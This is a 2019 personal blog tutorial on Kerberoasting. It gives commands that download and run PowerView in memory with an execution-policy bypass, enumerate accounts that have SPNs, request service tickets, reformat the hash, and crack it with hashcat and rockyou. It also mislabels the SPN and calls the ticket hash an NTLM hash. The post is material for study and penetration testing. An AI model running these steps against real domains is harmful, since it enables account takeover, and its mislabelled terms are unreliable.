Wednesday, August 28, 2019

Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory Environments. I recently learned  more about KerberRoasting and how to use it to compromise user accounts within Active directory. I'm going to go through the step by step process which involves requesting a Kerberos service Ticket(TGS) for the Service Principal Name(SPN) of a target service account with the intentions of cracking the service account NTLM Hash using hashcat.  Also want to point out that this type of attack is from an assumed breach standpoint ( meaning that you need to already have access to a device that is already authenticated to Active Directory) in order for this attack to work.


Step 1.  We are going to load up powerview powershell script into memory by using the following command:

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/
dev/Recon/PowerView.ps1')"








Step 2. Once  PowerView has been loaded into memory. run the following command to see which accounts has the Service Principal Number (SPN)

get-domainuser -spn






Step 3. As you can see the KobeBryant user account has an Service Principal Number (SPN).
 We are now going tell Kobe :) to go ahead and request an SPN Kerberos ticket using the following command:

get-domainuser kobe_bryant | Get-DomainSPNTicket






Once Kobe_bryant has requested the Service Principal Number (SPN) Ticket. The output from the Get-DomainSPNTicket command returns the NTLM Hash that is associated with the kobe_bryant user account.  I copied the NTLM Hash into my rawhash.txt file.






















Step4.  Next i took the rawhash output and converted it hashcat format using the following command:
cat rawhash.txt | tr -d '\n' | tr -d '\n' | tr -d ' ' | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' > hash.txt







Step 5. After converting the hash into hashcat format i ran the following command against the hash.txt file in order to crack the Kobe_bryant hash using my rockyou.txt word list file with the following command:

sudo hashcat -m13100 hash.txt  /usr/share/wordlists/rockyou.txt --force









Step 6. As you can see in the results from Hash Cat looks like the password for Kobe_Bryant Account is  P@$$W0rd.  Now that we have the password you can log in as Kobe_Bryant.



















at

2 comments:

  1. Tanya ChuaNovember 21, 2020 at 7:24 AM

    This post is really nice and informative. The explanation given is really comprehensive and informative..

    mobile application penetration testing service

    ReplyDelete
  2. SaishaJanuary 18, 2021 at 10:00 AM

    This post will be very useful to us....i like your blog and helpful to me....nice thoughts for your great work....

    iso 27001 certification bodies in india

    ReplyDelete

Subscribe to: Post Comments (Atom)

Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory En...